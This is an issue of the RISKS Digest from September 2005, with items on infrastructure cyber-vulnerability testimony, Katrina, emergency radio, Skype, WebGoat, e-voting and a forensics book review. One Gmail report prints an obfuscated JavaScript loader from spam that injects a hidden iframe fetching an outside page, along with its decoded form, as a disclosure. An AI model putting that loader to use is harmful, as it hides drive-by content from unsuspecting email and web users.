The Risks Digest

The RISKS Digest

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Volume 24 Issue 4

Friday 16 September 2005

Contents

Nation's Critical Infrastructure Vulnerable to Cyber Attack
U.S. House Science Committee
Katrina -- predictions before and response after
Inman Harvey
Health Records Of Evacuees Go Online
Jonathan Krim
One radio frequency for emergency services
Fred Cohen
LA power outage
PGN
Public Call for Skype to Release Specifications
Lauren Weinstein
WebGoat 3.7 - Application Security hands-on learning environment
Jeff Williams
National Academies/CSTB report on Electronic Voting
Herb Lin
Gmail security flaw: acts on javascript in unopened e-mail
Suw Charman
Re: Risks of REAL ID: incorrect
Steven M. Bellovin
CardSystems Complies With Industry Standards
Curt Sampson
REVIEW: "Forensic Discovery", Dan Farmer/Wietse Venema
Rob Slade
Info on RISKS (comp.risks)

Nation's Critical Infrastructure Vulnerable to Cyber Attack

<"Peter G. Neumann" <neumann@csl.sri.com>>
Fri, 16 Sep 2005 07:59:39 PDT

Committee on Science, SHERWOOD BOEHLERT, CHAIRMAN
Bart Gordon, Tennessee, Ranking Democrat
http://www.house.gov/science/press/109/109-129.htm
Press Contacts: Joe Pouliot  (202) 225-4275

WASHINGTON, D.C., September 15, 2005 - In testimony before the House Science
Committee today, the Chief Information Officers (CIOs) of major U.S.
corporations warned Congress that the nation's critical infrastructure
remains vulnerable to cyber attack. The witnesses said the economy is
increasingly dependent on the Internet and that a major attack could result
in significant economic disruption and loss of life.

Urging action to address this vulnerability, the witnesses advocated
increased funding for cybersecurity research and development (R&D) and
greater information sharing between industry and government and among
various sectors of industry. Witnesses also urged greater federal attention
to cybersecurity and praised the creation of an Assistant Secretary for
Cybersecurity at the Department of Homeland Security (DHS).

Testifying before the Committee were: Mr. Donald "Andy" Purdy, Acting
Director, National Cyber Security Division, Department of Homeland Security;
Mr. John Leggate, Chief Information Officer, British Petroleum Inc.; Mr.
David Kepler, Corporate Vice President, Shared Services, and Chief
Information Officer, The Dow Chemical Company; Mr. Andrew Geisse, Chief
Information Officer, SBC Services Inc.; and Mr. Gerald Freese, Director,
Enterprise Information Security, American Electric Power.

"We shouldn't have to wait for the cyber equivalent of a Hurricane Katrina
to realize that we are inadequately prepared to prevent, detect and respond
to cyber attacks," said Science Committee Chairman Sherwood Boehlert (R-NY).
"And a cyber attack can affect a far larger area at a single stroke than can
any hurricane. Not only that, given the increasing reliance of critical
infrastructures on the Internet, a cyber attack could result in deaths as
well as in massive disruption to the economy and daily life.

"So our goal this morning is to help develop a cybersecurity agenda for the
federal government, especially for the new Assistant Secretary. I never want
to have to sit on a special committee set up to investigate why we were
unprepared for a cyber attack. We know we are vulnerable, it's time to act."

Legate testified that an informal survey earlier this year found that
executives in the telecommunications, energy, chemical, and transportation
sectors estimated that about 30 percent of their revenue depends directly on
the Internet. He also said that, because of interdependency among various
industry sectors, a single attack could reverberate throughout the global
economy: "These cascading dependencies all too quickly create 'domino
effects' that are not obvious to the corporate customer or the policymaker."

Kepler told the Committee that the greatest concern for the chemical
industry is the potential for a combined cyber and physical attack. He said
he fears a potential terrorist "using information on shipments, product
inventory, or sites to construct a physical attack.using false identity to
acquire chemicals for improper use, [or].gaining inappropriate access to
systems to cause isolated disruptions."

To help prevent these scenarios from being realized, Kepler urged greater
industry input in the government's critical infrastructure protection
efforts. "Information sharing and continued cooperation between our sector
and the Department of Homeland Security is critical," he testified. "Above
all else, efforts must be focused on those threats of greatest impact and
concern to our national security, while addressing the unique needs of each
sector."

Freese said the security of his sector could also be enhanced through
increased coordination with federal agencies, such as DHS. He also urged
greater R&D funding to guide the development of a next generation Internet
and a generation power grid system that will have built-in security features
to protect against cyber attacks. "The long term solution to present
inadequacies is to build out the old infrastructure with the next generation
of technologies and equipment. The new infrastructure will be based on
greater levels of security and reliability, enhanced design, and recognition
of the interdependencies between the electricity sector and the
communications sector."

The industry witnesses praised the creation of the Assistant Secretary
position and said it will result in greater attention to cybersecurity
issues. Geisse also urged DHS to continue its focus on cyber-related
activities that have proven successful. He said, "We encourage the
Department of Homeland Security to continue to: support research grants and
assistance that focus on national cybersecurity; support industry
organizations and government agencies that create security standards and
best practices; provide early warnings of security events through various
government agencies; and make sure the security best practices that various
critical government agencies develop are shared with our critical
infrastructure industries."

109-129


Katrina -- predictions before and response after

<Inman Harvey <inmanh@cogs.susx.ac.uk>>
Thu, 08 Sep 2005 10:51:44 +0100

They told you so (2002):
- SPECIAL REPORT from THE TIMES-PICAYUNE -
It's only a matter of time before South Louisiana takes a direct hit
from a major hurricane. Billions have been spent to protect us, but we
grow more vulnerable every day.
Five-Part Series published June 23-27, 2002
http://www.nola.com/hurricane/?/washingaway/

They told you so (2004)
What if Hurricane Ivan Had Not Missed New Orleans?  Disasters Waiting to
Happen . . . Sixth in a Series Natural Hazards Observer, 2 November 2004
http://www.colorado.edu/hazards/o/nov04/nov04c.html

A couple of examples from many on
http://en.wikipedia.org/wiki/Predictions_of_hurricane_risk_for_New_Orleans

What use are calculations and predictions of risk, without the institutions
and the political will to react to them? From a viewpoint outside the US,
the response to the Katrina disaster has been quite frankly unbelievable --
sending in troops with guns as a priority over medical and humanitarian
assistance being the most bizarre.

The really big risk is the deep-seated systemic and institutional
malaise for which such responses are symptoms. This is far more than
merely a hurricane.

Inman Harvey, Evolutionary and Adaptive Systems Group, COGS/Informatics,
Univ. of Sussex, Brighton BN1 9QH, UK http://www.cogs.susx.ac.uk/users/inmanh/


Health Records Of Evacuees Go Online (Jonathan Krim)

<"Peter G. Neumann" <neumann@csl.sri.com>>
Wed, 14 Sep 2005 19:46:58 PDT

The federal government is making medical information on Hurricane Katrina
evacuees available online to doctors, the first time private records from
various pharmacies and other health care providers have been compiled into
centralized databases.  The data contain records from 150 Zip codes in areas
hit by Katrina.  Starting yesterday, doctors in eight shelters for evacuees
could go to the Internet to search prescription drug records on more than
800,000 people from the storm-racked region.  Officials hope to soon add
computerized records from Medicaid in Mississippi and Louisiana, Department
of Veterans Affairs health facilities, laboratories and benefits managers.

The records are one step in reconstructing medical files on more than 1
million people disconnected from their regular doctors and drug
stores. Officials fear that many medical records in the region, especially
those that were not computerized, were lost to the storm and its aftermath.

Although the immediate focus is on urgent care for hurricane victims,
participants in the effort say the disaster demonstrates a broader need to
computerize individual health records nationwide and make them available
throughout the medical system. Such a step could, for example, give
emergency room doctors a way to quickly view medical histories for
late-night accident victims.

Electronic health records are controversial among many privacy advocates,
who fear the data could be exploited by hackers, companies or the
government.  [Source: Jonathan Krim, Government Wants Doctors in Shelters to
Have Data, *The Washington Post*, 14 Sep 2005, A24; Thanks to Keith A
Rhodes.  PGN-ed.  The article has considerable discussion on the privacy
implications.]


One radio frequency for emergency services

<Fred Cohen <dr.cohen@mac.com>>
Sun, 11 Sep 2005 18:59:01 -0700

It is sad that politicians start to believe that they know how to solve
technical problems. One such sad case was Rudy Giuliani's pronouncement
today that a single frequency (then frequency band) for all emergency
services would make things work better. Now I am hardly the world's leading
expert on radio frequency spectrum allocation, but I do have some small
amount of experience in understanding radio communications and emergency
response, and I was startled, well not all that startled, perhaps bemused at
the lack of understanding displayed by people who are not risk management
professionals. Of course it seems that a lot of political folks think that
they can do as good a job as risk management professionals, and likely that
is why we are in such a sad state as a nation state at handling emergencies.
I haven't done a complete assessment of the suggestion, but here are some
initial thoughts.

The idea is that communications will work better if everyone can talk to
each other and therefore a single frequency band would allow them to do so
and improve emergency communications. Sounds sensible, however...

1) It means that in order to disrupt ALL emergency communications I only
need to jam one frequency band.

2) Different natural and artificial phenomena interfere with RF
communications in different frequency bands, so by using a relatively
limited portion of the available bandwidth, there is a guarantee that in
some places no communications will work.

3) If I want to listen into your communications, it makes it a lot easier if
I know the frequencies being used, and if everyone has to talk to each
other, then anyone can listen to everyone else.  Encryption won't solve this
of course for the same reason.

4) If there is a big emergency and everyone is on a small subset of the
bands available, there will be a lot of interference, reducing
communications effectiveness.

5) Certain weather and other human induced conditions wipe out portions of
the frequency band for periods of time, making ALL communications fail
simultaneously (see 1 above).

6) Interference between jurisdictions means that dispatchers in one
jurisdiction might end up talking over those of their neighbors, causing
confusion and more traffic problems as well as increasing the potential for
phony messages going on the air.

You all get the idea by now. Of course the last assessment I did that
involved a radio communications system for a local government was several
weeks back, and we were a bit concerned that they only had 3 redundant ways
to communicate via RF - Car radios that talk to towers in redundant
locations - hand-held radios on a different frequency range that could talk
to the towers, the cars, and each other independently of the other tower
system, and cellular telephones that they could use when the other systems
failed. They also reported problems of interference on rare occasions with
the frequencies used by neighboring jurisdictions (see 6 above), but only in
certain locations where they could communicate over quite a long distance
because of weather-related signal bounces off of clouds.

Different frequency bands are used for different things for good reasons,
and there are good reasons that a single frequency band for emergency
response would be a bad thing. Perhaps we should put Rudy in charge of FEMA
and see if things get better or worse... after all, the last political
appointee there with no expertise in emergency management worked out so
well...

Security Posture http://securityposture.com; University of New Haven;
Fred Cohen & Associates 1-925-454-0171 Security Management Partners

  [Further discussion at iwar@yahoogroups.com, including whether one
  frequency or one frequency band was intended.  PGN]


LA power outage

<"Peter G. Neumann" <neumann@csl.sri.com>>
Mon, 12 Sep 2005 16:28:43 PDT

About 700,000 electric customers in Los Angeles lost power Monday afternoon
(12 Sep 2005) after a worker mistakenly cut a wrong line, triggering a
cascade of problems in the city's power grid, a spokesman for the Los
Angeles Department of Water and Power said.  [The latest report as this
issue goes out is that the spec for the operation was incorrect, and that
the crew did exactly as they had been told.  PGN]


Public Call for Skype to Release Specifications

<Lauren Weinstein <lauren@vortex.com>>
Mon, 12 Sep 2005 14:47:24 -0700

As I noted in:

http://lists.elistx.com/archives/interesting-people/200509/msg00122.html

eBay's acquisition of Skype (now official) leads to new concerns over the
proprietary nature of Skype's security and encryption systems, which will
now be under the control of an extremely large and powerful corporate
entity.

For eBay and Skype to have a chance of maintaining the goodwill and trust of
Skype users, I call on Skype to forthwith release the specifications and
implementation details of Skype's encryption and related technologies.

This disclosure should ideally be made to the public, but at a minimum to an
independent panel of respected security, privacy, and encryption experts,
who can rigorously vet the Skype technology and make a public report
regarding its security, reliability, and associated issues.

There are also other significant concerns regarding this acquisition,
relating to eBay's privacy policies and how they may impact the privacy of
Skype users, but I'll hold those for a future message.

Lauren Weinstein lauren@pfir.org 1 818-225-2800
http://www.pfir.org/lauren http://www.eepi.org http://daythink.vortex.com


WebGoat 3.7 - Application Security hands-on learning environment

<"Jeff Williams" <jeff.williams@owasp.org>>
Tue, 6 Sep 2005 09:56:11 -0400

  [From SC-L, included in RISKS with permission of the author.  PGN]

The *only* way to learn application security is to test applications "hands
on" and examine their source code. To encourage the next generation of
application security experts, the Open Web Application Security Project
(OWASP) has developed an extensive lesson-based training environment called
"WebGoat".

WebGoat is a lessons based, deliberately insecure web application designed
to teach web application security. Each of the 25 lessons provides the user
an opportunity to demonstrate their understanding by exploiting a real
vulnerability. WebGoat provides the ability to examine the underlying code
to gain a better understanding of the vulnerability as well as provide
runtime hints to assist in solving each lesson. V3.7 includes lessons
covering most of the OWASP Top Ten vulnerabilities and contains several new
lessons on web services, SQL Injection, and authentication.

WebGoat 3.7 is available for free download from:

    http://www.owasp.org/software/webgoat.html

Simply unzip, run, and go to WebGoat in your browser to start learning.

The OWASP Foundation is dedicated to finding and fighting the causes of
insecure software. Find out more at http://www.owasp.org.


National Academies/CSTB report on Electronic Voting

<"Herb Lin" <HLin@nas.edu>>
September 13, 2005 10:31:17 PM EDT

Announcing a new report from CSTB on Electronic Voting.  Below is the media
advisory on it.  [Reproduced from Dave Farber's IP list.]

Election officials across the United States are increasingly looking to
electronic voting systems as a way to administer elections more efficiently,
but skeptics have raised concerns about the security and reliability of
these systems.  ASKING THE RIGHT QUESTIONS ABOUT ELECTRONIC VOTING, new from
the National Academies' National Research Council, offers a set of questions
that policy-makers and the public should ask to help ensure that the
technologies implemented are secure, reliable, efficient, and easy to use.
Advance copies are now available to reporters. The report, which was chaired
by DICK THORNBURGH, former governor of Pennsylvania, and RICHARD F. CELESTE,
former governor of Ohio, was released on September 13, 2005, and is
available free in PDF form at the web site below.

Press release at http://www4.nationalacademies.org/news.nsf/isbn/0309100240?OpenDocument

Full report at http://www.nap.edu/catalog/11449.html  (sign-in
required for the PDF version).

Herb Lin, Senior Scientist and Study Director, CSTB
National Academies, 1-202-334-3191


Gmail security flaw: acts on javascript in unopened e-mail

<Suw Charman <suw.charman@gmail.com>>
Fri, 16 Sep 2005 09:36:37 +0100

I received a spam this morning that opened audio files without me even
opening the e-mail. The spam was from 'news@capitalex.com' and had the
subject 'news'.

A closer looks reveals this code:

<Script Language='Javascript'>

<!--

document.write(unescape('%3C%49%46%52%41%4D%45%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%53%52%43%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%72%6F%66%6F%72%65%78%74%72%61%64%65%2E%63%6F%6D%2F%69%6D%61%67%65%73%2F%6E%65%77%65%78%2E%68%74%6D%6C%22%20%66%72%61%6D%65%42%6F%72%64%65%72%3D%22%31%22%20%0D%0A%0D%0A%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%3E%3C%2F%49%46%52%41%4D%45%3E'));

//-->

</Script>

This decodes to

<IFRAME width="1" height="1"
SRC="http://www.proforextrade.com/images/newex.html" frameBorder="1"
scrolling="no"></IFRAME>

That page loads automatically, *without me having opened the e-mail*, then
runs a shed load of rubbish including two audio files.

Full e-mail with headers available on request.


Re: Risks of REAL ID: incorrect (Re: RISKS-24.02)

<"Steven M. Bellovin" <smb@cs.columbia.edu>>
Mon, 29 Aug 2005 12:03:15 -0400

Charles Lamb's comment on the REAL ID law, though technically correct, is
disingenuous.  A National Research Council report ("Who Goes There --
Authentication Through the Lens of Privacy") noted this:

  Finding 6.5: State-issued driver's licenses are a de facto nationwide
  identity system. They are widely accepted for transactions that require a
  form of government-issued photo ID.

Steven M. Bellovin, http://www.cs.columbia.edu/~smb


CardSystems Complies With Industry Standards

<Curt Sampson <cjs@cynic.net>>
Fri, 2 Sep 2005 13:43:11 +0900 (JST)

At either of these two URLs:

  http://xrl.us/hd9g
  http://yahoo.reuters.com/financeQuoteCompanyNewsArticle.jhtml?duid=mtfh39850_2005-09-01_15-31-19_n01450451_newsml

you can read that

  Payments processor CardSystems Solutions Inc., where a security breach
  exposed more than 40 million credit card accounts to fraud, on Thursday
  said its auditor had completed a report to payment networks and concluded
  it complies with industry data-security standards.

The sad thing is, it's probably true.

Curt Sampson  <cjs@cynic.net>   +81 90 7737 2974   http://www.NetBSD.org


REVIEW: "Forensic Discovery", Dan Farmer/Wietse Venema

<Rob Slade <rslade@sprint.ca>>
Wed, 14 Sep 2005 08:16:39 -0800

BKFORDIS.RVW   20050310

"Forensic Discovery", Dan Farmer/Wietse Venema, 2005, 0-201-63497-X,
U$39.99/C$57.99
%A   Dan Farmer zen@fish2.com
%A   Wietse Venema wietse@porcupine.org
%C   P.O. Box 520, 26 Prince Andrew Place, Don Mills, Ontario M3C 2T8
%D   2005
%G   0-201-63497-X
%I   Addison-Wesley Publishing Co.
%O   U$39.99/C$57.99 800-822-6339 Fax: (617) 944-7273 bkexpress@aw.com
%O  http://www.amazon.com/exec/obidos/ASIN/020163497X/robsladesinterne
  http://www.amazon.co.uk/exec/obidos/ASIN/020163497X/robsladesinte-21
%O   http://www.amazon.ca/exec/obidos/ASIN/020163497X/robsladesin03-20
%O   Audience a+ Tech 3 Writing 1 (see revfaq.htm for explanation)
%P   217 p.
%T   "Forensic Discovery"

In the preface, the authors don't promise to teach the reader anything about
computer or digital forensics.  Rather, they are reporting on ten years'
worth of experience in looking into attacked machines.  Given the authors'
background, this is engrossing.  But turning it into useful guidance might
be left as an exercise for the reader.  This is not a tutorial work for the
novice, but a challenge to the experienced professional.

Part one outlines the basic concepts of forensics in digital systems.
Chapter one presents the "spirit of forensic discovery": look anywhere, for
anything, and be prepared when you find it.  (This is a tall order,
particularly the "being prepared" part, but it basically corresponds to my
experience.)  Time information and stamps (on UNIX systems) are discussed in
chapter two, along with mention of the ways that clumsy attempts to "save"
systems can destroy ephemeral information.  However, the level of the
material sweeps between broadly generic and tightly specific: it may be
difficult for those not already thoroughly familiar with forensic activities
to obtain useful guidance from it.

Part two is supposed to provide us with background on the abstractions of
the computer and operating systems that relate to forensic recovery of
materials.  Chapter three addresses file system basics, but does so
specifically with regard to the UNIX system.  The content is much more
detailed than conceptual (covering, for example, allowable characters in
UNIX filenames), and command examples are not always completely explained.
The usefulness of this approach is questionable, since the reader is assumed
to know the UNIX system well; in which case, why cover the elementary
fundamentals?  However, the work does highlight aspects of operating and
file system internals not encountered in normal administrative activity.
Analysis of information recovered from a compromised system is reviewed in
chapter four.  The methods and procedures are very strictly limited by the
case cited, but the examples demonstrate the backhanded thinking needed to
obtain interesting data after an intrusion.  A variety of intriguing ways to
subvert a running system are examined in chapter five.  As with previous
material, the text seems to talk around the topic, while the examples,
although fascinating, don't always support the general concepts under
discussion.  Analysis of the code of malicious software (a practice known in
virus research as forensic programming) is addressed in chapter six,
although the bulk of the content deals with test execution of the
programming (under various forms of restriction) and both the benefit and
complexity of disassembly is passed over rather lightly.

Part three moves beyond the concepts and into practical difficulties.
Chapter seven, although titularly about the contents of deleted files, is
primarily concerned with the conservation and preservation of the access,
modification, and (attribute) change times of files.  (In response to the
draft of this review, the authors clarified some of the points that they
were trying to make in the text, such as the fact that material from deleted
files is often more persistent than the content of active files.
Unfortunately, these points, while arresting, are not always clear in the
work itself.)  Retrieving data from memory, particularly via the swap or
paging areas of disk, is reviewed in chapter eight.

The preface does state that the authors intend this book to be useful to
sysadmins, incident responders, computer security professionals, and
forensic analysts.  I would suggest that only the last group will find much
here that they can use, and then only those at the advanced edges of the
field.  There is certainly much that is intriguing, but the material demands
of the reader that he or she have extensive background and knowledge of
system and filesystem internals.  Even then, extracting the information from
the target system, and drawing conclusions as to the implications of that
data, will be difficult.  Farmer and Venema have outlined some fascinating
material, on the bleeding edge of the technology, but have not made it easy
for practitioners to utilize or comprehend.

(In response to the draft review, The authors have noted that the full,
original text of the book is now available at http://fish2.com/forensics/ or
http://www.porcupine.org/forensics/.)

copyright Robert M. Slade, 2005   BKFORDIS.RVW   20050310
rslade@vcn.bc.ca      slade@victoria.tc.ca      rslade@sun.soci.niu.edu
http://victoria.tc.ca/techrev    or    http://sun.soci.niu.edu/~rslade

  [I found this book to be very useful, timely, and interesting.  PGN]

Please report problems with the web pages to the maintainer

Top